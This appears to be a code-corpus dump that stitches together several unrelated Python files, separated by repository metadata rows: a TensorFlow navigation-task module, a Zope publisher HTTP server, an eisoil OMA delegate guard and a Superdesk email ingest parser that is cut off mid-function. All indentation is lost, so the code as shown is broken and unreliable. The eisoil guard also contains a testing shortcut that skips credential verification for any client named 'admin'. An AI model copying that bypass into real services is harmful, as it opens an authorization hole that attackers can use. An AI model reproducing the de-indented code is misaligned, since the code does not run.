curr_xy = np.array(self._env.state[:2])
next_xy = np.array(self._env.vertex_to_pose(path[1]))
last_step_distance = np.linalg.norm(next_xy - curr_xy)
return (len(path) - 2) * self._env.cell_size_px + last_step_distance
def reset(self, observation):
if self._use_continuous_reward:
if len(self._env.targets()) != 1:
raise ValueError(
'FindX task with continuous reward is assuming only one target.')
goal_vertex = self._env.targets()[0]
self._previous_path_length = self._compute_path_length(goal_vertex)
def target_loss(self, truth, predicted, weights=None):
"""Action classification loss.
Args:
truth: a batch_size x sequence length x number of labels float
Tensor containing a one hot vector for each label in each batch and
time.
predicted: a batch_size x sequence length x number of labels float
Tensor containing a predicted distribution over all actions.
weights: a batch_size x sequence_length float Tensor of bool
denoting which actions are valid.
Returns:
An average cross entropy over all batches and elements in sequence.
"""
return classification_loss(
truth=truth, predicted=predicted, weights=weights, is_one_hot=True)
class RelativeLocationTask(RandomExplorationBasedTask):
"""A task of estimating the relative location of a query w.r.t current.
It is to be used for debugging. It is designed such that the output is a
single value, out of a discrete set of values, so that it can be phrased as
a classification problem.
"""
def __init__(self, num_labels, *args, **kwargs):
"""Initializes a relative location task.
Args:
num_labels: integer, number of orientations to bin the relative
orientation into.
*args: see super class.
**kwargs: see super class.
"""
super(RelativeLocationTask, self).__init__(*args, **kwargs)
self._num_labels = num_labels
if len(self.config.inputs.keys()) != 1:
raise NotImplementedError('current implementation supports input '
'with only one modality type')
def episode(self):
observations, states, path = self._exploration()
# Select a random element from history.
path_to_obs, _ = self._obs_to_state(path, states)
use_exploration_obs = not self._add_query_noise
query, _, query_state = self._sample_obs(
path[:-1],
observations.values()[0],
states,
path_to_obs,
max_obs_index=None,
use_exploration_obs=use_exploration_obs)
x, y, theta = tuple(states[-1])
q_x, q_y, _ = tuple(query_state)
t_x, t_y = q_x - x, q_y - y
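    # Express the offset to the query in the agent's frame (a rotation by the
    # agent heading theta) before binning the relative orientation below.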
(rt_x, rt_y) = (np.sin(theta) * t_x - np.cos(theta) * t_y,
np.cos(theta) * t_x + np.sin(theta) * t_y)
# Bins are [a(i), a(i+1)] for a(i) = -pi + 0.5 * bin_size + i * bin_size.
shift = np.pi * (1 - 1.0 / (2.0 * self._num_labels))
orientation = np.arctan2(rt_y, rt_x) + shift
if orientation < 0:
orientation += 2 * np.pi
label = int(np.floor(self._num_labels * orientation / (2 * np.pi)))
out_shape = self._config.output.shape
if len(out_shape) != 1:
raise ValueError('Output shape should be of rank 1.')
if out_shape[0] != self._num_labels:
raise ValueError('Output shape must be of size %d' % self._num_labels)
output = np.zeros(out_shape, dtype=np.float32)
output[label] = 1
return observations, query, (output, None)
def target_loss(self, truth, predicted, weights=None):
return classification_loss(
truth=truth, predicted=predicted, weights=weights, is_one_hot=True)
class LocationClassificationTask(UnrolledTask):
"""A task of classifying a location as one of several classes.
The task does not have an input, but just a query and an output. The query
is an observation of the current location, e.g. an image taken from the
  current state. The output is a label classifying this location into one of a
  predefined set of locations (or landmarks).
The current implementation classifies locations as intersections based on the
  number and directions of bifurcations. It is expected that a location can have
  at most 4 different directions, aligned with the axes. As each of these four
  directions might be present or not, the number of possible intersections is
2^4 = 16.
"""
def __init__(self, env, seed, *args, **kwargs):
super(LocationClassificationTask, self).__init__(*args, **kwargs)
self._env = env
self._rng = np.random.RandomState(seed)
# A location property which can be set. If not set, a random one is
# generated.
self._location = None
if len(self.config.inputs.keys()) > 1:
raise NotImplementedError('current implementation supports input '
'with only one modality type or less.')
@property
def location(self):
return self._location
@location.setter
def location(self, location):
self._location = location
def episode(self):
    # Get a location. If not set, sample one at a vertex with a random
    # orientation.
location = self._location
if location is None:
num_nodes = self._env.graph.number_of_nodes()
vertex = int(math.floor(self._rng.uniform(0, num_nodes)))
xy = self._env.vertex_to_pose(vertex)
theta = self._rng.uniform(0, 2 * math.pi)
location = np.concatenate(
[np.reshape(xy, [-1]), np.array([theta])], axis=0)
else:
vertex = self._env.pose_to_vertex(location)
theta = location[2]
neighbors = self._env.graph.neighbors(vertex)
xy_s = [self._env.vertex_to_pose(n) for n in neighbors]
def rotate(xy, theta):
"""Rotates a vector around the origin by angle theta.
Args:
xy: a numpy darray of shape (2, ) of floats containing the x and y
coordinates of a vector.
theta: a python float containing the rotation angle in radians.
Returns:
A numpy darray of floats of shape (2,) containing the x and y
coordinates rotated xy.
"""
rotated_x = np.cos(theta) * xy[0] - np.sin(theta) * xy[1]
rotated_y = np.sin(theta) * xy[0] + np.cos(theta) * xy[1]
return np.array([rotated_x, rotated_y])
    # Rotate all intersection bifurcations by the orientation of the agent as the
# intersection label is defined in an agent centered fashion.
xy_s = [
rotate(xy - location[0:2], -location[2] - math.pi / 4) for xy in xy_s
]
th_s = [np.arctan2(xy[1], xy[0]) for xy in xy_s]
out_shape = self._config.output.shape
if len(out_shape) != 1:
raise ValueError('Output shape should be of rank 1.')
num_labels = out_shape[0]
if num_labels != 16:
raise ValueError('Currently only 16 labels are supported '
'(there are 16 different 4 way intersection types).')
th_s = set([int(math.floor(4 * (th / (2 * np.pi) + 0.5))) for th in th_s])
one_hot_label = np.zeros((num_labels,), dtype=np.float32)
label = 0
for th in th_s:
label += pow(2, th)
one_hot_label[int(label)] = 1.0
query = self._env.observation(location).values()[0]
return [], query, (one_hot_label, None)
def reward(self, obs, done, info):
raise ValueError('Do not call.')
def target_loss(self, truth, predicted, weights=None):
return classification_loss(
truth=truth, predicted=predicted, weights=weights, is_one_hot=True)
class GotoStaticXNoExplorationTask(UnrolledTask):
"""An interface for findX tasks without exploration.
  The agent is initialized at a random location in a random world with a random
  goal, and the objective is for the agent to move toward the goal. This class
  generates episodes for such a task. Each episode is a sequence of observations
  x and target outputs y. x contains the observations, an OrderedDict with keys
provided from config.inputs.keys() and the shapes provided in the
config.inputs. The output is a numpy arrays with the shape specified in the
  config.output. The shape of the array is (sequence_length x action_size) where
  action_size is the number of actions that can be taken in the environment. Note
  that config.output.shape should be set according to the number of actions that
  can be taken in the env.
  The target outputs y are the groundtruth values of each action, computed
from the environment graph. The target output for each action is proportional
to the progress that each action makes. Target value of 1 means that the
action takes the agent one step closer, -1 means the action takes the agent
one step farther. Value of -2 means that action should not take place at all.
This can be because the action leads to collision or it wants to terminate the
episode prematurely.
"""
def __init__(self, env, *args, **kwargs):
super(GotoStaticXNoExplorationTask, self).__init__(*args, **kwargs)
if self._config.query is not None:
raise ValueError('query should be None.')
if len(self._config.output.shape) != 2:
raise ValueError('output should only have two dimensions:'
'(sequence_length x number_of_actions)')
for input_config in self._config.inputs.values():
if input_config.shape[0] != self._config.output.shape[0]:
raise ValueError('the first dimension of the input and output should'
'be the same.')
if len(self._config.output.shape) != 2:
raise ValueError('output shape should be '
'(sequence_length x number_of_actions)')
self._env = env
def _compute_shortest_path_length(self, vertex, target_vertices):
"""Computes length of the shortest path from vertex to any target vertexes.
Args:
vertex: integer, index of the vertex in the environment graph.
target_vertices: list of the target vertexes
Returns:
integer, minimum distance from the vertex to any of the target_vertices.
Raises:
ValueError: if there is no path between the vertex and at least one of
the target_vertices.
"""
try:
return np.min([
len(nx.shortest_path(self._env.graph, vertex, t))
for t in target_vertices
])
except:
#logging.error('there is no path between vertex %d and at least one of '
# 'the targets %r', vertex, target_vertices)
raise
def _compute_gt_value(self, vertex, target_vertices):
"""Computes groundtruth value of all the actions at the vertex.
The value of each action is the difference each action makes in the length
of the shortest path to the goal. If an action takes the agent one step
    closer to the goal the value is 1. If it takes the agent one step away
    from the goal the value is -1. If it leads to collision or if the agent uses
    the stop action before reaching the goal it is -2. To avoid scale issues the
    gt_values are multiplied by 0.5.
Args:
vertex: integer, the index of current vertex.
target_vertices: list of the integer indexes of the target views.
Returns:
numpy array with shape (action_size,) and each element is the groundtruth
value of each action based on the progress each action makes.
"""
action_size = self._config.output.shape[1]
output_value = np.ones((action_size), dtype=np.float32) * -2
my_distance = self._compute_shortest_path_length(vertex, target_vertices)
for adj in self._env.graph[vertex]:
adj_distance = self._compute_shortest_path_length(adj, target_vertices)
if adj_distance is None:
continue
action_index = self._env.action(
self._env.vertex_to_pose(vertex), self._env.vertex_to_pose(adj))
assert action_index is not None, ('{} is not adjacent to {}. There might '
'be a problem in environment graph '
'connectivity because there is no '
'direct edge between the given '
'vertices').format(
self._env.vertex_to_pose(vertex),
self._env.vertex_to_pose(adj))
output_value[action_index] = my_distance - adj_distance
return output_value * 0.5
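  # Worked example (hypothetical distances): if the current vertex is 3 steps
  # from the goal and a neighbor is 2 steps away, the action moving to that
  # neighbor gets value 0.5 * (3 - 2) = 0.5; actions not leading to any
  # neighbor keep the initialization 0.5 * (-2) = -1.0.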
def episode(self):
"""Returns data needed to train and test a single episode.
Returns:
(inputs, None, output) where inputs is a dictionary of modality types to
numpy arrays. The second element is query but we assume that the goal
is also given as part of observation so it should be None for this task,
      and the output is the tuple of ground truth action values with the
shape of (sequence_length x action_size) that is coming from
config.output.shape and a numpy array with the shape of
(sequence_length,) that is 1 if the corresponding element of the
input and output should be used in the training optimization.
Raises:
ValueError: If the output values for env.random_step_sequence is not
valid.
ValueError: If the shape of observations coming from the env is not
consistent with the config.
ValueError: If there is a modality type specified in the config but the
environment does not return that.
"""
# Sequence length is the first dimension of any of the input tensors.
sequence_length = self._config.inputs.values()[0].shape[0]
modality_types = self._config.inputs.keys()
path, _, _, step_outputs = self._env.random_step_sequence(
max_len=sequence_length)
target_vertices = [self._env.pose_to_vertex(x) for x in self._env.targets()]
if len(path) != len(step_outputs):
      raise ValueError('path and step_outputs should have equal length'
' {}!={}'.format(len(path), len(step_outputs)))
    # Building up observations. observations will be an OrderedDict of
# modality types. The values are numpy arrays that follow the given shape
# in the input config for each modality type.
observations = collections.OrderedDict([k, []] for k in modality_types)
for step_output in step_outputs:
obs_dict = step_output[0]
# Only going over the modality types that are specified in the input
# config.
for modality_type in modality_types:
if modality_type not in obs_dict:
raise ValueError('modality type is not returned from the environment.'
                           ' {} not in {}'.format(modality_type,
obs_dict.keys()))
obs = obs_dict[modality_type]
if np.any(
obs.shape != tuple(self._config.inputs[modality_type].shape[1:])):
raise ValueError(
              'The observations should have the same size as specified in '
'config for modality type {}. {} != {}'.format(
modality_type, obs.shape,
self._config.inputs[modality_type].shape[1:]))
observations[modality_type].append(obs)
gt_value = [self._compute_gt_value(v, target_vertices) for v in path]
# pylint: disable=unbalanced-tuple-unpacking
gt_value, _, value_mask = _pad_or_clip_array(
np.array(gt_value),
sequence_length,
is_front_clip=False,
output_mask=True,
)
for modality_type, obs in observations.iteritems():
observations[modality_type], _, mask = _pad_or_clip_array(
np.array(obs), sequence_length, is_front_clip=False, output_mask=True)
assert np.all(mask == value_mask)
return observations, None, (gt_value, value_mask)
def reset(self, observation):
"""Called after the environment is reset."""
pass
def target_loss(self, true_targets, targets, weights=None):
"""A loss for training a task model.
This loss measures the discrepancy between the task outputs, the true and
predicted ones.
Args:
true_targets: tf.Tensor of tf.float32 with the shape of
(batch_size x sequence_length x action_size).
targets: tf.Tensor of tf.float32 with the shape of
(batch_size x sequence_length x action_size).
weights: tf.Tensor of tf.bool with the shape of
(batch_size x sequence_length).
Raises:
ValueError: if the shapes of the input tensors are not consistent.
Returns:
L2 loss between the predicted action values and true action values.
"""
targets_shape = targets.get_shape().as_list()
true_targets_shape = true_targets.get_shape().as_list()
if len(targets_shape) != 3 or len(true_targets_shape) != 3:
raise ValueError('invalid shape for targets or true_targets_shape')
if np.any(targets_shape != true_targets_shape):
raise ValueError('the shape of targets and true_targets are not the same'
                       ' {} != {}'.format(targets_shape, true_targets_shape))
if weights is not None:
# Filtering targets and true_targets using weights.
weights_shape = weights.get_shape().as_list()
if np.any(weights_shape != targets_shape[0:2]):
raise ValueError('The first two elements of weights shape should match'
                         ' target. {} != {}'.format(weights_shape,
targets_shape))
true_targets = tf.boolean_mask(true_targets, weights)
targets = tf.boolean_mask(targets, weights)
return tf.losses.mean_squared_error(tf.reshape(targets, [-1]),
tf.reshape(true_targets, [-1]))
def reward(self, obs, done, info):
raise NotImplementedError('reward is not implemented for this task')
################################################################################
class NewTask(UnrolledTask):
def __init__(self, env, *args, **kwargs):
super(NewTask, self).__init__(*args, **kwargs)
self._env = env
def _compute_shortest_path_length(self, vertex, target_vertices):
"""Computes length of the shortest path from vertex to any target vertexes.
Args:
vertex: integer, index of the vertex in the environment graph.
target_vertices: list of the target vertexes
Returns:
integer, minimum distance from the vertex to any of the target_vertices.
Raises:
ValueError: if there is no path between the vertex and at least one of
the target_vertices.
"""
try:
return np.min([
len(nx.shortest_path(self._env.graph, vertex, t))
for t in target_vertices
])
except:
      #logging.error('there is no path between vertex %d and at least one of '
      #              'the targets %r', vertex, target_vertices)
raise
def _compute_gt_value(self, vertex, target_vertices):
"""Computes groundtruth value of all the actions at the vertex.
The value of each action is the difference each action makes in the length
of the shortest path to the goal. If an action takes the agent one step
    closer to the goal the value is 1. If it takes the agent one step away
    from the goal the value is -1. If it leads to collision or if the agent uses
    the stop action before reaching the goal it is -2. To avoid scale issues the
    gt_values are multiplied by 0.5.
Args:
vertex: integer, the index of current vertex.
target_vertices: list of the integer indexes of the target views.
Returns:
numpy array with shape (action_size,) and each element is the groundtruth
value of each action based on the progress each action makes.
"""
action_size = self._config.output.shape[1]
output_value = np.ones((action_size), dtype=np.float32) * -2
    # own compute _compute_shortest_path_length - returns float
my_distance = self._compute_shortest_path_length(vertex, target_vertices)
for adj in self._env.graph[vertex]:
adj_distance = self._compute_shortest_path_length(adj, target_vertices)
if adj_distance is None:
continue
action_index = self._env.action(
self._env.vertex_to_pose(vertex), self._env.vertex_to_pose(adj))
assert action_index is not None, ('{} is not adjacent to {}. There might '
'be a problem in environment graph '
'connectivity because there is no '
'direct edge between the given '
'vertices').format(
self._env.vertex_to_pose(vertex),
self._env.vertex_to_pose(adj))
output_value[action_index] = my_distance - adj_distance
return output_value * 0.5
def episode(self):
"""Returns data needed to train and test a single episode.
Returns:
(inputs, None, output) where inputs is a dictionary of modality types to
numpy arrays. The second element is query but we assume that the goal
is also given as part of observation so it should be None for this task,
      and the output is the tuple of ground truth action values with the
shape of (sequence_length x action_size) that is coming from
config.output.shape and a numpy array with the shape of
(sequence_length,) that is 1 if the corresponding element of the
input and output should be used in the training optimization.
Raises:
ValueError: If the output values for env.random_step_sequence is not
valid.
ValueError: If the shape of observations coming from the env is not
consistent with the config.
ValueError: If there is a modality type specified in the config but the
environment does not return that.
"""
# Sequence length is the first dimension of any of the input tensors.
sequence_length = self._config.inputs.values()[0].shape[0]
modality_types = self._config.inputs.keys()
path, _, _, step_outputs = self._env.random_step_sequence(
max_len=sequence_length)
target_vertices = [self._env.pose_to_vertex(x) for x in self._env.targets()]
if len(path) != len(step_outputs):
      raise ValueError('path and step_outputs should have equal length'
' {}!={}'.format(len(path), len(step_outputs)))
    # Building up observations. observations will be an OrderedDict of
# modality types. The values are numpy arrays that follow the given shape
# in the input config for each modality type.
observations = collections.OrderedDict([k, []] for k in modality_types)
for step_output in step_outputs:
obs_dict = step_output[0]
# Only going over the modality types that are specified in the input
# config.
for modality_type in modality_types:
if modality_type not in obs_dict:
raise ValueError('modality type is not returned from the environment.'
                           ' {} not in {}'.format(modality_type,
obs_dict.keys()))
obs = obs_dict[modality_type]
if np.any(
obs.shape != tuple(self._config.inputs[modality_type].shape[1:])):
raise ValueError(
              'The observations should have the same size as specified in '
'config for modality type {}. {} != {}'.format(
modality_type, obs.shape,
self._config.inputs[modality_type].shape[1:]))
observations[modality_type].append(obs)
gt_value = [self._compute_gt_value(v, target_vertices) for v in path]
# pylint: disable=unbalanced-tuple-unpacking
gt_value, _, value_mask = _pad_or_clip_array(
np.array(gt_value),
sequence_length,
is_front_clip=False,
output_mask=True,
)
for modality_type, obs in observations.iteritems():
observations[modality_type], _, mask = _pad_or_clip_array(
np.array(obs), sequence_length, is_front_clip=False, output_mask=True)
assert np.all(mask == value_mask)
return observations, None, (gt_value, value_mask)
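  # Shape summary (T = sequence_length, A = action_size): each observations
  # entry is padded/clipped to the shape given in config.inputs for its
  # modality, gt_value has shape (T, A), and value_mask has shape (T,) with 1
  # marking the steps that should contribute to the training loss.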
def reset(self, observation):
"""Called after the environment is reset."""
pass
def target_loss(self, true_targets, targets, weights=None):
"""A loss for training a task model.
    This loss measures the discrepancy between the true and predicted task
    outputs.
Args:
true_targets: tf.Tensor of tf.float32 with the shape of
(batch_size x sequence_length x action_size).
targets: tf.Tensor of tf.float32 with the shape of
(batch_size x sequence_length x action_size).
weights: tf.Tensor of tf.bool with the shape of
(batch_size x sequence_length).
Raises:
ValueError: if the shapes of the input tensors are not consistent.
Returns:
L2 loss between the predicted action values and true action values.
"""
targets_shape = targets.get_shape().as_list()
true_targets_shape = true_targets.get_shape().as_list()
if len(targets_shape) != 3 or len(true_targets_shape) != 3:
raise ValueError('invalid shape for targets or true_targets_shape')
if np.any(targets_shape != true_targets_shape):
      raise ValueError('the shape of targets and true_targets are not the same:'
                       ' {} != {}'.format(targets_shape, true_targets_shape))
if weights is not None:
# Filtering targets and true_targets using weights.
weights_shape = weights.get_shape().as_list()
if np.any(weights_shape != targets_shape[0:2]):
        raise ValueError('The first two elements of weights shape should match '
                         'target. {} != {}'.format(weights_shape,
                                                   targets_shape))
true_targets = tf.boolean_mask(true_targets, weights)
targets = tf.boolean_mask(targets, weights)
return tf.losses.mean_squared_error(tf.reshape(targets, [-1]),
tf.reshape(true_targets, [-1]))
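  # Minimal usage sketch (tensor names are hypothetical):
  #   loss = task.target_loss(true_q, predicted_q, weights=step_mask)
  # with true_q and predicted_q of shape (batch_size x sequence_length x
  # action_size) and step_mask a boolean (batch_size x sequence_length) tensor;
  # the entries selected by the mask are flattened and compared with a
  # mean-squared-error loss.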
def reward(self, obs, done, info):
raise NotImplementedError('reward is not implemented for this task')
| apache-2.0 | 4,448,068,774,327,045,000 | 38.465826 | 80 | 0.646759 | false |
Donkyhotay/MoonPy | zope/server/http/publisherhttpserver.py | 1 | 2732 | ##############################################################################
#
# Copyright (c) 2001, 2002 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""HTTP Server that uses the Zope Publisher for executing a task.
$Id: publisherhttpserver.py 39058 2005-10-11 18:31:25Z philikon $
"""
import zope.deprecation
from zope.server.http import wsgihttpserver
from zope.publisher.publish import publish
import zope.security.management
class PublisherHTTPServer(wsgihttpserver.WSGIHTTPServer):
def __init__(self, request_factory, sub_protocol=None, *args, **kw):
def application(environ, start_response):
request = request_factory(environ['wsgi.input'], environ)
request = publish(request)
response = request.response
start_response(response.getStatusString(), response.getHeaders())
return response.consumeBody()
return super(PublisherHTTPServer, self).__init__(
application, sub_protocol, *args, **kw)
class PMDBHTTPServer(wsgihttpserver.WSGIHTTPServer):
def __init__(self, request_factory, sub_protocol=None, *args, **kw):
def application(environ, start_response):
request = request_factory(environ['wsgi.input'], environ)
try:
request = publish(request, handle_errors=False)
except:
import sys, pdb
print "%s:" % sys.exc_info()[0]
print sys.exc_info()[1]
zope.security.management.restoreInteraction()
try:
pdb.post_mortem(sys.exc_info()[2])
raise
finally:
zope.security.management.endInteraction()
response = request.response
start_response(response.getStatusString(), response.getHeaders())
return response.consumeBody()
        return super(PMDBHTTPServer, self).__init__(
application, sub_protocol, *args, **kw)
# BBB: Backward-compatibility.
zope.deprecation.deprecated(
('PublisherHTTPServer', 'PMDBHTTPServer'),
'This plain publisher support has been replaced in favor of the '
'WSGI HTTP server '
'The reference will be gone in Zope 3.4.')
| gpl-3.0 | 1,636,733,148,539,408,000 | 37.478873 | 78 | 0.617496 | false |
EICT/C-BAS | src/plugins/ofed1/omavonedelegateguard.py | 1 | 2181 | from eisoil.config import expand_eisoil_path
import eisoil.core.pluginmanager as pm
import eisoil.core.log
logger=eisoil.core.log.getLogger('ofed')
from omavonedelegate import OMAv1Delegate
gfed_ex = pm.getService('gfedv1exceptions')
config = pm.getService('config')
geniutil = pm.getService('geniutil')
class OMAv1DelegateGuard(OMAv1Delegate):
"""Wraps the OMAv1Delegate and performs authorization."""
# no authentication, hence no overwrite
# def lookup_public_member_info(self, client_cert, field_filter, field_match, options):
def lookup_identifying_member_info(self, client_cert, credentials, field_filter, field_match, options):
result = super(OMAv1DelegateGuard, self).lookup_identifying_member_info(client_cert, credentials, field_filter, field_match, options)
self._authorize_dict_list(client_cert, credentials, result, options)
return result
def lookup_private_member_info(self, client_cert, credentials, field_filter, field_match, options):
result = super(OMAv1DelegateGuard, self).lookup_private_member_info(client_cert, credentials, field_filter, field_match, options)
self._authorize_dict_list(client_cert, credentials, result, options)
return result
def _authorize_dict_list(self, client_cert, credentials, result, options):
client_cert = geniutil.infer_client_cert(client_cert, credentials)
try:
trusted_cert_path = expand_eisoil_path(config.get("ofed.cert_root"))
geniutil.verify_certificate(client_cert, trusted_cert_path)
# TODO remove this (only for testing)
      # BEGIN REMOVE
client_urn, client_uuid, client_email = geniutil.extract_certificate_info(client_cert)
client_auth, client_type, client_name = geniutil.decode_urn(client_urn)
if not client_name == "admin": # only test if the name is not admin
# END REMOVE
for urn, info in result.iteritems():
geniutil.verify_credential(credentials, client_cert, urn, trusted_cert_path, ('list',))
except Exception as e:
raise gfed_ex.GFedv1AuthorizationError(str(e))
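    # Any failure above (certificate or credential verification) is re-raised
    # as a single GFedv1AuthorizationError, so callers only have to handle one
    # authorization exception type.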
| bsd-3-clause | -7,023,253,175,945,145,000 | 50.928571 | 141 | 0.699679 | false |
mugurrus/superdesk-core | superdesk/io/feed_parsers/rfc822.py | 5 | 20464 |
# -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license*.
import datetime
import email
import io
import logging
import re
from email.header import decode_header
import eve
from flask import current_app as app, json
from pytz import timezone
import superdesk
from superdesk import get_resource_service
from superdesk.errors import IngestEmailError
from superdesk.io.registry import register_feed_parser
from superdesk.io.feed_parsers import EmailFeedParser
from superdesk.io.iptc import subject_codes
from superdesk.media.media_operations import process_file_from_stream
from superdesk.metadata.item import ITEM_TYPE, CONTENT_TYPE, GUID_TAG, SIGN_OFF, BYLINE, FORMATS, FORMAT
from superdesk.metadata.utils import generate_guid
from superdesk.users.errors import UserNotRegisteredException
from superdesk.utc import utcnow, get_date
from apps.archive.common import format_dateline_to_locmmmddsrc
from superdesk.filemeta import set_filemeta
from superdesk.text_utils import sanitize_html
logger = logging.getLogger(__name__)
email_regex = re.compile('^.*<(.*)>$')
class EMailRFC822FeedParser(EmailFeedParser):
"""
    Feed Parser for feeds in RFC 822 (email) format.
"""
NAME = 'email_rfc822'
label = 'EMail RFC822 Parser'
def __init__(self):
self.parser_app = app
def can_parse(self, email_message):
for response_part in email_message:
if isinstance(response_part, tuple):
msg = email.message_from_bytes(response_part[1])
return self.parse_header(msg['from']) != ''
return False
def parse(self, data, provider=None):
config = provider.get('config', {})
# If the channel is configured to process structured email generated from a google form
if config.get('formatted', False):
return self._parse_formatted_email(data, provider)
try:
new_items = []
# create an item for the body text of the email
# either text or html
item = dict()
item[ITEM_TYPE] = CONTENT_TYPE.TEXT
item['versioncreated'] = utcnow()
comp_item = None
# a list to keep the references to the attachments
refs = []
html_body = None
text_body = None
for response_part in data:
if isinstance(response_part, tuple):
msg = email.message_from_bytes(response_part[1])
item['headline'] = self.parse_header(msg['subject'])
field_from = self.parse_header(msg['from'])
item['original_source'] = field_from
try:
if email_regex.findall(field_from):
email_address = email_regex.findall(field_from)[0]
user = get_resource_service('users').get_user_by_email(email_address)
item['original_creator'] = user[eve.utils.config.ID_FIELD]
except UserNotRegisteredException:
pass
item['guid'] = msg['Message-ID']
date_tuple = email.utils.parsedate_tz(msg['Date'])
if date_tuple:
dt = datetime.datetime.utcfromtimestamp(
email.utils.mktime_tz(date_tuple))
dt = dt.replace(tzinfo=timezone('utc'))
item['firstcreated'] = dt
# this will loop through all the available multiparts in mail
for part in msg.walk():
if part.get_content_type() == "text/plain":
body = part.get_payload(decode=True)
try:
# if we don't know the charset just have a go!
if part.get_content_charset() is None:
text_body = body.decode()
else:
charset = part.get_content_charset()
text_body = body.decode(charset)
continue
except Exception as ex:
logger.exception(
"Exception parsing text body for {0} from {1}: {2}".format(item['headline'],
field_from, ex))
continue
if part.get_content_type() == "text/html":
body = part.get_payload(decode=True)
try:
if part.get_content_charset() is None:
html_body = body.decode()
else:
charset = part.get_content_charset()
html_body = body.decode(charset)
html_body = sanitize_html(html_body)
continue
except Exception as ex:
logger.exception(
"Exception parsing html body for {0} from {1}: {2}".format(item['headline'],
field_from, ex))
continue
if part.get_content_maintype() == 'multipart':
continue
if part.get('Content-Disposition') is None:
continue
# we are only going to pull off image attachments at this stage
if part.get_content_maintype() != 'image':
continue
fileName = part.get_filename()
if bool(fileName):
image = part.get_payload(decode=True)
content = io.BytesIO(image)
res = process_file_from_stream(content, part.get_content_type())
file_name, content_type, metadata = res
if content_type == 'image/gif' or content_type == 'image/png':
continue
content.seek(0)
image_id = self.parser_app.media.put(content, filename=fileName,
content_type=content_type, metadata=metadata)
renditions = {'baseImage': {'href': image_id}}
# if we have not got a composite item then create one
if not comp_item:
comp_item = dict()
comp_item[ITEM_TYPE] = CONTENT_TYPE.COMPOSITE
comp_item['guid'] = generate_guid(type=GUID_TAG)
comp_item['versioncreated'] = utcnow()
comp_item['groups'] = []
comp_item['headline'] = item['headline']
comp_item['groups'] = []
comp_item['original_source'] = item['original_source']
if 'original_creator' in item:
comp_item['original_creator'] = item['original_creator']
# create a reference to the item that stores the body of the email
item_ref = {'guid': item['guid'], 'residRef': item['guid'],
'headline': item['headline'], 'location': 'ingest',
'itemClass': 'icls:text', 'original_source': item['original_source']}
if 'original_creator' in item:
item_ref['original_creator'] = item['original_creator']
refs.append(item_ref)
media_item = dict()
media_item['guid'] = generate_guid(type=GUID_TAG)
media_item['versioncreated'] = utcnow()
media_item[ITEM_TYPE] = CONTENT_TYPE.PICTURE
media_item['renditions'] = renditions
media_item['mimetype'] = content_type
set_filemeta(media_item, metadata)
media_item['slugline'] = fileName
if text_body is not None:
media_item['body_html'] = text_body
media_item['headline'] = item['headline']
media_item['original_source'] = item['original_source']
if 'original_creator' in item:
media_item['original_creator'] = item['original_creator']
new_items.append(media_item)
# add a reference to this item in the composite item
media_ref = {'guid': media_item['guid'], 'residRef': media_item['guid'],
'headline': fileName, 'location': 'ingest', 'itemClass': 'icls:picture',
'original_source': item['original_source']}
if 'original_creator' in item:
media_ref['original_creator'] = item['original_creator']
refs.append(media_ref)
if html_body:
item['body_html'] = html_body
else:
item['body_html'] = '<pre>' + text_body + '</pre>'
item[FORMAT] = FORMATS.PRESERVED
# if there is composite item then add the main group and references
if comp_item:
grefs = {'refs': [{'idRef': 'main'}], 'id': 'root', 'role': 'grpRole:NEP'}
comp_item['groups'].append(grefs)
grefs = {'refs': refs, 'id': 'main', 'role': 'grpRole:Main'}
comp_item['groups'].append(grefs)
new_items.append(comp_item)
new_items.append(item)
return new_items
except Exception as ex:
raise IngestEmailError.emailParseError(ex, provider)
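    # In short, parse() returns one text item built from the email body plus,
    # when image attachments are present, a picture item per attachment and a
    # composite item whose groups reference all of them.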
def parse_header(self, field):
try:
hdr = decode_header(field)
encoding = hdr[0][1]
if encoding and hdr:
parsed_field = hdr[0][0].decode(encoding)
else:
parsed_field = hdr[0][0]
except Exception:
try:
parsed_field = str(field)
except Exception:
parsed_field = 'Unknown'
pass
return parsed_field
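        # Illustrative behaviour (header value is hypothetical): an encoded
        # subject such as '=?utf-8?q?caf=C3=A9?=' is decoded with its declared
        # charset, a plain ASCII header is returned unchanged, and anything
        # that cannot be decoded falls back to str(field) or, failing that,
        # 'Unknown'.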
def _attr_name_whitelisted(self, attr_name):
return attr_name.lower() in ["href", "style", "color", "size", "bgcolor", "border"]
def safe_css(self, attr, css):
if attr == "style":
return re.sub("(width|height):[^;]+;", "", css)
return css
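        # Example (illustrative value): safe_css('style', 'width:100px;color:red;')
        # drops the width declaration and keeps 'color:red;'.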
def _expand_category(self, item, mail_item):
"""Given a list of category names in the incoming email try to look them up to match category codes.
If there is a subject associated with the category it will insert that into the item as well
:param item:
:param mail_item:
:return: An item populated with category codes
"""
anpa_categories = superdesk.get_resource_service('vocabularies').find_one(req=None,
_id='categories')
if anpa_categories:
for mail_category in mail_item.get('Category').split(','):
for anpa_category in anpa_categories['items']:
if anpa_category['is_active'] is True \
and mail_category.strip().lower() == anpa_category['name'].lower():
if 'anpa_category' not in item:
item['anpa_category'] = list()
item['anpa_category'].append({'qcode': anpa_category['qcode']})
if anpa_category.get('subject'):
if 'subject' not in item:
item['subject'] = list()
item['subject'].append({'qcode': anpa_category.get('subject'),
'name': subject_codes[
anpa_category.get('subject')]})
break
def _parse_formatted_email(self, data, provider):
"""Construct an item from an email that was constructed as a notification from a google form submission.
The google form submits to a google sheet, this sheet creates the email as a notification
:param data:
:param provider:
:return: A list of 1 item
"""
try:
item = dict()
item[ITEM_TYPE] = CONTENT_TYPE.TEXT
item['versioncreated'] = utcnow()
for response_part in data:
if isinstance(response_part, tuple):
msg = email.message_from_bytes(response_part[1])
# Check that the subject line matches what we expect, ignore it if not
if self.parse_header(msg['subject']) != 'Formatted Editorial Story':
return []
item['guid'] = msg['Message-ID']
